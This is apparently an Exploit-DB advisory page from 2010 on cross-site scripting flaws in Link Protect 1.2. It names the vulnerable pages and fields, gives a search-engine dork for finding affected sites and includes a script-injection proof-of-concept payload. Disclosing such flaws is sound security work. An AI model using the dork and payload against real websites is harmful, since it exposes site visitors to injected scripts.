Link Protect 1.2 XSS Vulnerabilities

vendor:

Link Protect

by:

Shichemt Alen

7,5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: Link Protect

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: None

CPE: None

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2 DE & Ubuntu 10.10

2010

Link Protect 1.2 XSS Vulnerabilities

Link Protect 1.2 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can inject malicious JavaScript code into the 'description', 'name', 'email' or 'link' fields of the 'linkcheck.php', 'contact_us.php' and 'signup.php' pages. This malicious code will be executed in the browser of the victim when they visit the vulnerable page.

Mitigation:

Input validation should be used to prevent XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Link Protect 1.2 XSS Vulnerabilities
# Date: 11-29-2010
# Author: Shichemt Alen
# Software Link: None
# Version: 1.2
# Platform / Tested on: Windows XP SP2 DE & Ubuntu 10.10
# category: webapps/0day
# Dork : inurl:"sorry script'kiddies"
# Contact : shichemt@hotmail.com - http://www.shichemt-alen.com/


#Exploit : http://localhost/fail/linkcheck.php?linkid=++++++

---------- http://localhost/fail/contact_us.php

---------- http://localhost/fail/signup.php

Put "><script>alert("EPIC FAIL\nTunisia")</script> in description, name, email or link


############ Made in Tunisia +216 ############

Greets to :  Geeks Team {Pr0t3ct0r,Hamed, K-D0vic, Mid0vik, UbunBoy}

-----------------------

xTobi, Net-Own3r, Wx, BosnianTREX, Number7, Ghost-tn and All Friends...

& All Tunisian and Muslim Hackers...


############ Made in Tunisia +216 ############